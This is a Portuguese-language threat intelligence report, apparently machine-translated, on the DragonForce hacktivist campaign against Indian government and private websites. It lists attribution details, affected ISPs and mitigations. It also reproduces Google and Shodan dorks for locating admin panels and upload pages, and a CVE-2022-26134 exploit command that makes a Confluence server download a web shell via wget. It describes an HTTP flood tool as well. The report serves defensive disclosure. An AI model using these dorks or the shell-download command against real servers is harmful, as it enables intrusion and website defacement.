Categoria: Inteligência do adversárioIndústria: MúltiploMotivação: HacktivismoPaís: Índia

Sumário executivo

AMEAÇAIMPACTOMITIGAÇÃO

• A DragonForce tem atacado ativamente entidades indianas sob #OpsPatuk e #OpsIndia.
• Grupos de atores de ameaças do Paquistão, Turquia e Palestina se juntaram à campanha.

• Violação de alguns sites governamentais confidenciais contendo PII, operações militares e outros segredos governamentais.

• Implemente tecnologias anti-DDoS
• Utilize equipamentos de rede especialmente projetados.
• Provedores de hospedagem na Internet e equipes governamentais de resposta cibernética devem estar em alerta máximo.

Análise e atribuição

Informações das mídias sociais

• Em 10 de junho de 2022, CloudSEKda plataforma contextual de risco digital de IA XV Vigília descobriu um Tweet postado pelo grupo hacktivista malaio DragonForce, pedindo ataques a sites do governo indiano por hackers muçulmanos em todo o mundo.
• O objetivo principal do grupo no ataque era se vingar do governo indiano por comentários polêmicos sobre o profeta Maomé feitos por alguns políticos indianos.
• Desde então, o grupo e seus apoiadores comprometeram mais de 3.000 organizações governamentais e não governamentais, sites militares e entidades privadas.
• As entidades comprometidas incluem o BJP (o partido governante da Índia), sites de veteranos do Exército, institutos acadêmicos, etc.

Sobre seus servidores

• O grupo usa dois servidores DNS, “annabel.ns.cloudflare.com” e “nicolas.ns.cloudflare.com” com 104.21.35.227 e 172.67.180.87 sendo os endereços IP dos servidores, respectivamente.
• Foi descoberto que o domínio DragonForce estava hospedado junto com vários sites russos, australianos, chineses e outros, além de vários domínios adultos.

Técnicas, táticas e procedimentos (TTPs)

Os três principais vetores de ataque usados pelo grupo e seus apoiadores são os seguintes e expressos no fluxograma:

• Google Dorking
• Idiotas de Shodan
• Ataques DDoS

[caption id="attachment_20079" align="aligncenter” width="1931"] Diagrama de fluxo ilustrando uma visão geral do TTP empregado pelo grupo DragonForce e seus parceiros [/caption]

Idiotas do Google

• Os Google Dorks são a principal fonte dos alvos do grupo, o que é confirmado pela seguinte imagem de um vídeo do Tiktok feito por um dos aliados do DragonForce:

[caption id="attachment_20080" align="aligncenter” width="410"] Imagem de um vídeo PoC de um parceiro da DragonForce revelando o Google Dorks na pesquisa [/caption]

• A lista do Google Dorks incluía idiotas para encontrar várias instituições educacionais, onde foram encontrados idiotas relacionados a logins acadêmicos e universitários.
• A lista completa contém cerca de 360 Google Dorks que poderiam ter sido abusados para vários fins maliciosos. Alguns idiotas importantes da lista são mencionados:

Idiotas do Googleem url: /admin/upload/ : Ministério do Conhecimento e Compartilhamento de Recursosinurl: administrador do /login/login.php: Para logins de administrador em sites usando a linguagem PHP“tipos de arquivos permitidos: png gif jpg txt site: gov.in” : Google Dork fará upload de arquivos shell html para o servidorphp? id= site:in: Sites indianos com parâmetros de ID que podem ser abusados e a manipulação de URL pode ser realizadainurl/mnux= login no campus : Instituições acadêmicas com parâmetro de login no Campusinurl/mnux = login acadêmico: Instituições acadêmicas com parâmetro de login acadêmicoinurl/mnux = login acadêmico administrativo: Instituições acadêmicas com parâmetro de login acadêmico administrativoinurl: /admin/cp.php: Revela todos os sites com painel de controle que pode fornecer acesso ao servidor.inurl: admin/upload.php: Para sites com recurso de upload que os atores poderiam explorar para o shell usando o script deface

Vulnerabilidade entre Shodan Dorks e Atlassian Confluence

• Foi compartilhada uma PoC para a exploração da vulnerabilidade do Atlassian Confluence junto com as vulnerabilidades do Shodan Dork for Confluence Server voltadas para a região indiana.

Shodan Dork diz: http.favicon.hash: -305179312 país: "IN”

• O ator também compartilhou um script de repositório do GitHub que pode ser baixado e explorado usando o seguinte comando python:

CVE-2022-26134.py http://targets.com “wget https://site.com/shell.txt -O DFM.php

Ataques de DDoS (inundação de HTTP)

• O grupo convidou seus membros e outros usuários do fórum para realizar o ataque DDoS, onde eles compartilharam um infográfico informando o site, os endereços IP e a porta do alvo.

[caption id="attachment_20081" align="aligncenter” width="815"] Infográfico compartilhado pelo grupo DragonForce para Opsindia/Opspatuk [/caption]

• O grupo usou uma ferramenta chamada HTTPFLOOD (também conhecido como “./404FOUND.MY”), que manipula e publica solicitações indesejadas para derrubar um servidor ou aplicativo da Web. A ferramenta foi criada na linguagem Python e usa as três entradas a seguir:
  • Um URL de destino
  • Uma lista de proxy
  • Número de threads (ou seja, contagem de solicitações a serem enviadas ao servidor)
• Uma análise mais aprofundada descobriu que o usuário 'SKYSG404' criou a ferramenta HTTPFLOOD e que tanto a ferramenta quanto a conta Github que a hospeda foram criadas em 12 de junho de 2022.

[caption id="attachment_20082" align="aligncenter” width="1920"] Captura de tela da conta do Github que hospeda HTTPFLOOD (./404found.my) [/caption]

Servidores comprometedores

• Observou-se que um grande número de domínios, sendo direcionados, foram resolvidos para um IP comum onde estavam hospedados.
• Os atacantes parecem ter obtido acesso ao servidor por meio de uma vulnerabilidade de injeção em um dos sites.
• Quando um servidor é comprometido, todos os sites hospedados nele são facilmente vítimas dos atacantes, como pode ser visto no gráfico circular abaixo.

[caption id="attachment_20083" align="aligncenter” width="809"] Gráfico circular representando IP comum sendo compartilhado por vários nomes de domínio [/caption]

• Conforme testemunhado na tabela abaixo, quase 61% dos domínios comprometidos pertenciam a E2eNetworks.in que tem sede em Delhi, Índia.
• Outra grande parte, 20,8%, dos domínios invadidos pertencia a Atria Convergence Technologies Pvt. Ltd.
• Juntos, esses dois ISPs constituem cerca de 81% dos sites comprometidos.

Compartilhamento de nomes de domínio resolvidos para informações comuns de IP e ISP

IPPorcentagemLocalizaçãoNome do ISP164.52.212.5840.1 Saidabad, Nova Delhi, Índia E2E Networks. in216.48.179.6020.8 Saidabad, Nova Delhi, Índia E2E Networks. IN183.83.180.22620.8 Lucknow, Uttar Pradesh, ÍndiaAtria Convergence Technologies pvt Ltd 120.138.4.2188.2 Valsad, Gujarat, Índia Shreenet 103.115.194.394.8 Mumbai, Indianet Magic Datacenter Mumbai

Impacto e mitigação

ImpactoMitigação

• A escalada dessas campanhas em nível global pode levar a consequências atrozes para o governo e as entidades indianas.
• Os dados expostos forneceriam aos agentes mal-intencionados os detalhes necessários para lançar ataques sofisticados.
• Ataques à infraestrutura de defesa podem fazer com que informações confidenciais sejam comprometidas e causar um problema de segurança nacional.

• Corrija endpoints vulneráveis e exploráveis.
• Monitore anomalias em contas de usuários e aplicativos web expostos à Internet, indicando possíveis aquisições de contas.
• Escaneie repositórios para identificar credenciais e segredos expostos.
• Monitore fóruns de crimes cibernéticos para ver as táticas mais recentes empregadas pelos agentes de ameaças.

Referências

• *Fonte de inteligência e confiabilidade da informação - Wikipedia
• ^#Protocolo de semáforo - Wikipedia

Apêndice

[caption id="attachment_20084" align="aligncenter” width="1366"] O servidor do site da Universidade de Mumbai ficou inativo após o ataque de DDOS [/caption] [caption id="attachment_20085" align="aligncenter” width="1280"] Infográfico compartilhado pelo grupo DragonForce para OpsIsrael/OpsBedil [/caption] [caption id="attachment_20086" align="aligncenter” width="1326"] annabel.ns.cloudflare.com Servidor DNS com 2110 domínios hospedados. [/legenda] [caption id="attachment_20087" align="aligncenter” width="1207"] nicolas.ns.cloudflare.com Servidor DNS com 3909 domínios hospedados. [/legenda]